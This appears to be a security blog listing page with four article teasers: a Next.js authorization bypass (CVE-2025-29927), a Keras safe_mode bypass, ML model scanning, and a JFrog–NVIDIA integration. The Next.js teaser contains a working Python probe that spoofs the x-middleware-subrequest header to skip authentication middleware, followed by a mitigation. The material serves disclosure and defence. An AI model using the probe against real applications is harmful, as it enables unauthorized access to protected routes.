
CVE-2025-29927 - Authorization Bypass Vulnerability in Next.js: All You Need to Know

On March 21st, 2025, the Next.js maintainers announced a new authorization bypass vulnerability, CVE-2025-29927. The vulnerability is easy to exploit, and in some cases exploitation can also lead to cache poisoning and denial of service.
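The bypass abuses the internal x-middleware-subrequest header, which Next.js used to stop middleware from recursing into itself: a crafted value makes the server skip middleware entirely, including any authorization check it performs. Below is a minimal Python sketch of a probe for the issue; the target URL, the protected route, and the middleware path ("middleware" vs. "src/middleware") are assumptions that vary per deployment.

```python
# Minimal probe sketch for CVE-2025-29927, assuming a vulnerable
# Next.js app at https://target.example with a protected route /admin
# and a root-level middleware file (middleware.ts). Deployments using
# a src/ layout would need "src/middleware" instead.
import requests

TARGET = "https://target.example/admin"

# Next.js treated this internal header as proof that middleware had
# already run; newer versions required the middleware name repeated
# up to the recursion limit, which older versions also accept.
bypass_value = ":".join(["middleware"] * 5)

normal = requests.get(TARGET, timeout=10, allow_redirects=False)
bypass = requests.get(
    TARGET,
    headers={"x-middleware-subrequest": bypass_value},
    timeout=10,
    allow_redirects=False,
)

# On a vulnerable app the second request skips the middleware's
# auth check, e.g. returning 200 where the first returned 307 or 401.
print(normal.status_code, bypass.status_code)
```

Besides upgrading to a patched release, the stop-gap recommended in the advisory was to strip external x-middleware-subrequest headers at the proxy or CDN layer before they reach the application.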

Is TensorFlow Keras "Safe Mode" Actually Safe? Bypassing safe_mode Mitigation to Achieve Arbitrary Code Execution

Update: This issue was discovered and disclosed to Keras independently by JFrog’s research team and by Peng Zhou. Machine learning frameworks often rely on serialization and deserialization mechanisms to store and load models. However, improper code isolation and executable components embedded in models can lead to severe security risks, and the structure of the Keras v3 model format in TensorFlow is a case in point.
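For context, Keras exposes a documented safe_mode flag on model loading (enabled by default in Keras 3) that is meant to block deserialization of arbitrary code such as Lambda layers. A minimal sketch of its intended use follows; the file names are hypothetical, and, as the article's title indicates, safe_mode alone proved bypassable, so it should not be treated as a substitute for refusing to load untrusted models.

```python
# Sketch of the mitigation the article probes: Keras 3's safe_mode
# flag on model loading. The file names here are hypothetical.
import keras

# With safe_mode=True (the default), loading raises an error if the
# archive tries to deserialize arbitrary code such as a Python lambda.
model = keras.saving.load_model("untrusted_model.keras", safe_mode=True)

# Opting out re-enables arbitrary-code deserialization and should only
# ever be done for models you built and stored yourself:
# model = keras.saving.load_model("trusted_model.keras", safe_mode=False)
```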

JFrog and Hugging Face Join Forces to Expose Malicious ML Models

MLOps engineers, data scientists, and developers currently face critical security challenges on multiple fronts. First, staying up to date with evolving attack techniques requires constant vigilance and security know-how, which can realistically only be provided by a dedicated security team. Second, existing ML model scanning engines suffer from a staggering rate of false positives.
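To make the false-positive problem concrete, here is a toy illustration (not any vendor's engine) of the naive approach many scanners take: flagging every import a pickle stream performs. Because every legitimate pickled model also imports its own classes on load, an opcode-level rule like this trips on benign files just as readily as on malicious ones.

```python
# Toy illustration of naive pickle scanning and why it over-reports.
import pickle
import pickletools
from collections import OrderedDict


def naive_scan(payload: bytes) -> list[str]:
    """Flag every import a pickle stream performs (GLOBAL opcodes)."""
    hits = []
    for opcode, arg, _pos in pickletools.genops(payload):
        if opcode.name == "GLOBAL":
            hits.append(str(arg))
    return hits


# A perfectly benign object still imports its class when unpickled,
# so this rule flags it just as it would flag an os.system payload.
benign = pickle.dumps(OrderedDict(a=1), protocol=2)  # protocol 2 emits GLOBAL
print(naive_scan(benign))  # ['collections OrderedDict'] -> a false positive
```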

Accelerating Enterprise AI Development: A Guide to the JFrog-NVIDIA NIM Integration

Enterprises are racing to integrate AI into applications, yet transitioning from prototype to production remains difficult: managing ML models efficiently while ensuring security and governance is a critical challenge. JFrog’s integration with NVIDIA NIM addresses these issues by applying enterprise-grade DevSecOps practices to AI development. Before exploring this solution further, let’s examine the core MLOps challenges it solves.
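One concrete piece of that DevSecOps story is routing model downloads through an internal registry rather than pulling directly from public hubs. The sketch below assumes an Artifactory instance with a Hugging Face-compatible remote repository named "hf-remote" (the server name and repository are hypothetical); with the client pointed at the internal endpoint, every model pull can be cached, scanned, and access-controlled.

```python
# Sketch: routing Hugging Face model pulls through an internal proxy,
# assuming a hypothetical Artifactory server with a Hugging Face
# remote repository named "hf-remote". HF_ENDPOINT must be set before
# huggingface_hub is imported, since the client reads it at import time.
import os

os.environ["HF_ENDPOINT"] = (
    "https://mycompany.jfrog.io/artifactory/api/huggingfaceml/hf-remote"
)

from huggingface_hub import snapshot_download  # respects HF_ENDPOINT

# The download now flows through the internal registry instead of
# going straight to the public hub.
local_dir = snapshot_download(repo_id="google-bert/bert-base-uncased")
print(local_dir)
```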